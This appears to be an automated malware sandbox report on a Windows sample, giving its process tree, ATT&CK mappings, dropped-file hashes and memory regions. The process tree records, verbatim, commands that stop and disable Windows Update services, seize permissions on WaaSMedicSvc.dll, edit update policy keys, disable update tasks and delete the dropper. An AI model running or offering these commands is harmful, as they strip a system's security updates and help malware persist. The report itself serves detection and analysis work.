        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:3692
        
        C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        10⤵
        Launches sc.exe
        
        PID:5428
        
        C:\Windows\system32\sc.exe
        
        sc stop bits
        10⤵
        Launches sc.exe
        
        PID:5360
        
        C:\Windows\system32\sc.exe
        
        sc stop dosvc
        10⤵
        Launches sc.exe
        
        PID:4896
        
        C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        10⤵
        Launches sc.exe
        
        PID:372
        
        C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        10⤵
        Launches sc.exe
        
        PID:5152
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        10⤵
        Launches sc.exe
        
        PID:5636
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:5504
        
        C:\Windows\system32\sc.exe
        
        sc config bits start= disabled
        10⤵
        Launches sc.exe
        
        PID:5564
        
        C:\Windows\system32\sc.exe
        
        sc failure bits reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:5672
        
        C:\Windows\system32\sc.exe
        
        sc config dosvc start= disabled
        10⤵
        Launches sc.exe
        
        PID:5784
        
        C:\Windows\system32\sc.exe
        
        sc failure dosvc reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:5776
        
        C:\Windows\system32\sc.exe
        
        sc config UsoSvc start= disabled
        10⤵
        Launches sc.exe
        
        PID:5940
        
        C:\Windows\system32\sc.exe
        
        sc failure UsoSvc reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:5960
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        10⤵
        Launches sc.exe
        
        PID:5132
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:4268
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5448
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2692
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        10⤵
        
        PID:2172
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        10⤵
        
        PID:2764
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        10⤵
        
        PID:2300
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        10⤵
        
        PID:4852
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        10⤵
        
        PID:1616
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        10⤵
        
        PID:336
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        10⤵
        
        PID:3724
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        10⤵
        
        PID:1956
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        10⤵
        
        PID:1300
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        10⤵
        
        PID:3476
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        10⤵
        
        PID:908
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        10⤵
        
        PID:3128
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        10⤵
        
        PID:2616
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        9⤵
        Power Settings
        
        PID:4660
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:2472
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        10⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4384
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        10⤵
        Power Settings
        
        PID:1972
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        10⤵
        Power Settings
        
        PID:5208
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        10⤵
        Power Settings
        
        PID:5156
        
        C:\Windows\System32\conhost.exe
        
        C:\Windows\System32\conhost.exe
        9⤵
        
        PID:2992
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "sjrcqeodaodte"
        10⤵
        
        PID:4384
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        6⤵
        
        PID:5420
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5440
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        7⤵
        
        PID:5680
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c start C:\Users\Admin\AppData\Local\Temp\explorer.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2668
  - - C:\Users\Admin\AppData\Local\Temp\explorer.exe
      C:\Users\Admin\AppData\Local\Temp\explorer.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1584
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1992
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c start C:\Users\Admin\AppData\Local\Temp\windowshost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3968
  - - C:\Users\Admin\AppData\Local\Temp\windowshost.exe
      C:\Users\Admin\AppData\Local\Temp\windowshost.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:2104
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe"
        5⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3520
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat" "
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1856
        
        C:\driverPerf\cominto.exe
        
        "C:\driverPerf\cominto.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3636

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3836

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4024

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:1516

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1504

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1780

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2632

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:3196

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3856

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1660

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2524

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4992

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv AXB8u4d2VU2ngd5X/ofl0Q.0.2
1⤵
PID:5208

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

Filesize
539B

MD5
8ee0f3b0e00f89f7523395bb72e9118b

SHA1
bec3fa36a1fb136551dc8157a4963ba5d2f957d4

SHA256
8c5f958972fce1812970a1f8da8ccef94a86663d42d13e296813673638a6b68b

SHA512
55f862beb42fa76ca118b2c76c92cb1e0a2586727c602645d0d4bd0e8f2120cfc2015f4333df67f3bd9f4eda8b9b399774461ab558f08312920a1489acf7a207

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
3cb5b061d6c96ee444f8799d9857049b

SHA1
79af989b8513adca5cc19820e3298d280ffce0f9

SHA256
8237c8873ecc70fb15a340f3ef41955059e0451450185940d47fbe5907ce1a76

SHA512
5ac49af91fb9478189561efc650eea29d911138015e35464e8f97e3408ef03db1b7ba2a317b2415048d8f53aded73931bc144abf183b491bc79242342c8309e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
15a3333105ee87c5881aba190717115e

SHA1
2593e5aa40bfd51ec7d507dd82ebadaf4b2f9c74

SHA256
521c254195f624ed4479e01fc82b7943480dfcc804f28a8b04d5fc0001be6e73

SHA512
819f6f8e980f34a7b0a29cc7a215201f7f64a0c5bb6374f88c28d8861ed7ec1bfdb90c67375a440255bfc1d680e88bfaf79c433fd9b5638d38d3dcefe65cae27

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
66438c018ef632cf11b5c638e5d97f22

SHA1
be477e49129b718c28d4d5e326bf43c5ed12fa83

SHA256
9ec582f5eb024e57a91148e7df33cd4c5e02cd3a6ee393997364e519867c7215

SHA512
178dba926a0764bd518202cfea8061fc5e5295c5b81775ad2397ee10dcddbf0200eb5a9a00116f123766aba052bda33922e2debffe4d0c554df906977d52067e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u3p0cqlq.clj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\explorer.exe

Filesize
95KB

MD5
19eab19c0d0a0b062c8eb85a94a79cc6

SHA1
3f0e2e88b9ff61e2e56edc473861cc4373af525a

SHA256
02eb6c61b19d347b9b6846285991142bb0d7515401f8fc4cf7f961be72a3c215

SHA512
550b2aa4b1892643f4a06d9df302f5685e9275ca9b302b8467fd35af806add36fe6ba6202488ea6209ee1b4a79f638d5f6e729bcf4a1b73fd38c4d4570b28223

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
2.1MB

MD5
fa0429acc4b9cfd414d24fae0e299790

SHA1
80d76038b5401080e18e6b015cbf806d9abe8589

SHA256
1440a0bb2287c84bc89c40255413dc2cab070a4382b59e9cffaa3abfe7da5489

SHA512
f6af06d7c505ab4d23a80fe616422302c5a87bfbefc81d6b0f4af36fcf86f30f865dcb4806581799a139f1b965c8d3b842125ac0b4c9a8ea59469601d9edff9e

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowshost.exe

Filesize
2.8MB

MD5
51ab765a1b1f884f936db4ffc642d728

SHA1
7b7741bf5dfeaed3860bf308733490017688fa46

SHA256
816835537df73c3297cb1a0ddfe02d8f051f0fd9486ee2b1e53969b37fa87f14

SHA512
e25fdd4a7f4fd8bfe9491ec8138ed08077c2c2cd63686e6e4a59859e27294cc35d0ff99ff0b29ae3c2901c6f99e970f6d8e80435d86811398fdb41cf1bbb5234

Download Submit
C:\Windows\Tasks\dialersvc32.job

Filesize
5KB

MD5
688d33ab9cc93e29079ffa6212dc94f6

SHA1
cccda262d7c2d8d82c1529d00b3b158c06baba3d

SHA256
1f2738e7c475ee01d2c15f570aac598467355024c2441e86a7d3ffac01788226

SHA512
edd59e0559c226d970d2a6b18f418b67bcf583ed746c823bae2ca370c0e4ca5d5bd7af357822a638329878e865494e3c8dd66a36ed34f93b1b18846dc59adb6c

Download Submit
C:\Windows\Tasks\dialersvc64.job

Filesize
5KB

MD5
6c57f591aab7fd6a2b710e41c461a239

SHA1
1138c827dd5e1ef568573965309243522ee28b0b

SHA256
425461325cfc47ade3f906d1d6b9e39ab164117e3258d34ba5414728ed91bbe0

SHA512
12289c64b14c483c033c48237d4ebd33755972a581d57b94307c016edbe85119627095d00b72da1b909de4dcf7b6a849982fa11bad7e1ad1f761c974c6aadcaf

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
3KB

MD5
90da204b95e863dc622c45cf157c5bf6

SHA1
ce345b6a1834178a4db5ed785757d5c685aafc69

SHA256
94b5cd9d7d639e6d610b1404282d6a81a2e13867bf2f1379d449d490deaaf61f

SHA512
ce2735f4b888672761358c050256cc6239e25e225bd2443f0bdd59975f1a38267cf791419d567d194c2d767afb7edb9c28cc86e4a00371303b6f7377827bc949

Download Submit
C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe

Filesize
212B

MD5
76764afd7b394cd6a9c36fa16d4c88fc

SHA1
5274a18139edf134230252c97652bfa6319b1a78

SHA256
e58f2652ec82227d6ecacc733adb6e9812fcb39283ef87aba2be65326851e50e

SHA512
3018cbc23b59527b0fe54fc17f13735dddf2e91ac188afb7abdb6fc932e2a965d725b0ffaa8b03fcc7c9f4fbd9f1ba3aafde6a2e3fe1112ccbe42fca44be01ae

Download Submit
C:\driverPerf\cominto.exe

Filesize
2.5MB

MD5
4344aa160852993fab07ae5793321886

SHA1
d33a04a9f58d6172bfaa611ceeb03b24b7c5bee5

SHA256
bbbebdfec732e0805dc3865cfa2f546120e7300d8d6d98ba71ca85026375add4

SHA512
557c569a182284d43db1342aaa64b61acae4665548fa2a7c63af05d45ae1058d070f536c6c80a859e54a051177d21cc21c86b3de4cb03d1d63c993495067d2c0

Download Submit
C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat

Filesize
27B

MD5
61b88edb5f6dca914ee05650653d8223

SHA1
4b61f3f21e8c981aaa73e375d090de82be46720d

SHA256
eba6d05af3adbcc9a111fe968c3a2c725221f8f7896df3490bc2509bec01cf12

SHA512
1eea3fe2ca12c0d9bc3f9a7a13a1438cdd25e35607232025477af885db7987f6cd4d03613e6be0f6c8457e9db3eaf9b394f62ed14dffa4fbb36c1c07d8e5e7b5

Download Submit
memory/64-211-0x00007FFB03C50000-0x00007FFB03C60000-memory.dmp

Filesize
64KB

Download
memory/64-210-0x0000019ECC520000-0x0000019ECC54A000-memory.dmp

Filesize
168KB

Download
memory/584-200-0x000001DC79180000-0x000001DC791A3000-memory.dmp

Filesize
140KB

Download
memory/584-201-0x000001DC791B0000-0x000001DC791DA000-memory.dmp

Filesize
168KB

Download
memory/584-202-0x00007FFB03C50000-0x00007FFB03C60000-memory.dmp

Filesize
64KB

Download
memory/680-206-0x00007FFB03C50000-0x00007FFB03C60000-memory.dmp

Filesize
64KB

Download
memory/680-205-0x00000200C4890000-0x00000200C48BA000-memory.dmp

Filesize
168KB

Download
memory/744-217-0x000002288FB60000-0x000002288FB8A000-memory.dmp

Filesize
168KB

Download
memory/744-218-0x00007FFB03C50000-0x00007FFB03C60000-memory.dmp

Filesize
64KB

Download
memory/760-195-0x00007FFB41CC0000-0x00007FFB41D7E000-memory.dmp

Filesize
760KB

Download
memory/760-194-0x00007FFB43BD0000-0x00007FFB43DC5000-memory.dmp

Filesize
2.0MB

Download
memory/760-193-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/760-192-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/760-198-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/912-77-0x00000000002E0000-0x000000000056E000-memory.dmp

Filesize
2.6MB

Download
memory/912-83-0x0000000000E90000-0x0000000000E9E000-memory.dmp

Filesize
56KB

Download
memory/948-223-0x00007FFB03C50000-0x00007FFB03C60000-memory.dmp

Filesize
64KB

Download
memory/948-222-0x000002277A790000-0x000002277A7BA000-memory.dmp

Filesize
168KB

Download
memory/952-213-0x000001F0E2520000-0x000001F0E254A000-memory.dmp

Filesize
168KB

Download
memory/952-214-0x00007FFB03C50000-0x00007FFB03C60000-memory.dmp

Filesize
64KB

Download
memory/964-96-0x000001CB93420000-0x000001CB93641000-memory.dmp

Filesize
2.1MB

Download
memory/964-97-0x000001CBAE0A0000-0x000001CBAE2C2000-memory.dmp

Filesize
2.1MB

Download
memory/1056-226-0x00007FFB03C50000-0x00007FFB03C60000-memory.dmp

Filesize
64KB

Download
memory/1056-225-0x000001DA71D30000-0x000001DA71D5A000-memory.dmp

Filesize
168KB

Download
memory/1064-232-0x000002115A2F0000-0x000002115A31A000-memory.dmp

Filesize
168KB

Download
memory/1064-233-0x00007FFB03C50000-0x00007FFB03C60000-memory.dmp

Filesize
64KB

Download
memory/1136-236-0x00007FFB03C50000-0x00007FFB03C60000-memory.dmp

Filesize
64KB

Download
memory/1136-235-0x0000018222000000-0x000001822202A000-memory.dmp

Filesize
168KB

Download
memory/1176-110-0x000001A6AA5F0000-0x000001A6AA612000-memory.dmp

Filesize
136KB

Download
memory/1184-238-0x000002840F660000-0x000002840F68A000-memory.dmp

Filesize
168KB

Download
memory/1184-239-0x00007FFB03C50000-0x00007FFB03C60000-memory.dmp

Filesize
64KB

Download
memory/1260-241-0x00000249A6660000-0x00000249A668A000-memory.dmp

Filesize
168KB

Download
memory/1260-242-0x00007FFB03C50000-0x00007FFB03C60000-memory.dmp

Filesize
64KB

Download
memory/1272-249-0x00007FFB03C50000-0x00007FFB03C60000-memory.dmp

Filesize
64KB

Download
memory/1272-248-0x0000017E0A2B0000-0x0000017E0A2DA000-memory.dmp

Filesize
168KB

Download
memory/1300-28-0x0000000004EE0000-0x0000000004F46000-memory.dmp

Filesize
408KB

Download
memory/1300-27-0x0000000004CC0000-0x0000000004D26000-memory.dmp

Filesize
408KB

Download
memory/1300-68-0x0000000007DB0000-0x0000000008354000-memory.dmp

Filesize
5.6MB

Download
memory/1300-57-0x00000000060B0000-0x00000000060CA000-memory.dmp

Filesize
104KB

Download
memory/1300-53-0x0000000007180000-0x00000000077FA000-memory.dmp

Filesize
6.5MB

Download
memory/1300-52-0x0000000005B80000-0x0000000005B9E000-memory.dmp

Filesize
120KB

Download
memory/1300-17-0x0000000004F90000-0x00000000055B8000-memory.dmp

Filesize
6.2MB

Download
memory/1300-26-0x0000000004BA0000-0x0000000004BC2000-memory.dmp

Filesize
136KB

Download
memory/1300-69-0x0000000006D50000-0x0000000006DE2000-memory.dmp

Filesize
584KB

Download
memory/1300-40-0x00000000055C0000-0x0000000005914000-memory.dmp

Filesize
3.3MB

Download
memory/1584-16-0x00000000054C0000-0x0000000005AD8000-memory.dmp

Filesize
6.1MB

Download
memory/1584-29-0x0000000004F80000-0x0000000004FCC000-memory.dmp

Filesize
304KB

Download
memory/1584-41-0x00000000051E0000-0x00000000052EA000-memory.dmp

Filesize
1.0MB

Download
memory/1584-14-0x0000000000650000-0x000000000066E000-memory.dmp

Filesize
120KB

Download
memory/1584-18-0x0000000004EE0000-0x0000000004EF2000-memory.dmp

Filesize
72KB

Download
memory/1584-19-0x0000000004F40000-0x0000000004F7C000-memory.dmp

Filesize
240KB

Download
memory/1928-132-0x0000000007640000-0x0000000007654000-memory.dmp

Filesize
80KB

Download
memory/1928-129-0x0000000007600000-0x0000000007611000-memory.dmp

Filesize
68KB

Download
memory/1928-99-0x00000000705B0000-0x00000000705FC000-memory.dmp

Filesize
304KB

Download
memory/2196-188-0x00000000050E0000-0x0000000005434000-memory.dmp

Filesize
3.3MB

Download
memory/2220-137-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2220-136-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2768-66-0x0000000005F10000-0x0000000005F2E000-memory.dmp

Filesize
120KB

Download
memory/2768-70-0x0000000006D80000-0x0000000006D8A000-memory.dmp

Filesize
40KB

Download
memory/2768-13-0x0000000004450000-0x0000000004486000-memory.dmp

Filesize
216KB

Download
memory/2768-54-0x0000000005F30000-0x0000000005F62000-memory.dmp

Filesize
200KB

Download
memory/2768-55-0x00000000705B0000-0x00000000705FC000-memory.dmp

Filesize
304KB

Download
memory/2768-67-0x0000000006BF0000-0x0000000006C93000-memory.dmp

Filesize
652KB

Download
memory/2768-71-0x0000000006F90000-0x0000000007026000-memory.dmp

Filesize
600KB

Download
memory/2768-81-0x0000000006F80000-0x0000000006F88000-memory.dmp

Filesize
32KB

Download
memory/2768-80-0x0000000007030000-0x000000000704A000-memory.dmp

Filesize
104KB

Download
memory/2768-79-0x0000000006F50000-0x0000000006F64000-memory.dmp

Filesize
80KB

Download
memory/2768-78-0x0000000006F40000-0x0000000006F4E000-memory.dmp

Filesize
56KB

Download
memory/2768-72-0x0000000006F00000-0x0000000006F11000-memory.dmp

Filesize
68KB

Download
memory/3088-157-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/4328-191-0x00007FFB41CC0000-0x00007FFB41D7E000-memory.dmp

Filesize
760KB

Download
memory/4328-189-0x000002746ED00000-0x000002746ED3C000-memory.dmp

Filesize
240KB

Download
memory/4328-190-0x00007FFB43BD0000-0x00007FFB43DC5000-memory.dmp

Filesize
2.0MB

Download
memory/4384-1057-0x0000027494F80000-0x0000027494F86000-memory.dmp

Filesize
24KB

Download
memory/4548-134-0x000001EF569F0000-0x000001EF56A02000-memory.dmp

Filesize
72KB

Download
memory/4548-135-0x000001EF56A10000-0x000001EF56A16000-memory.dmp

Filesize
24KB

Download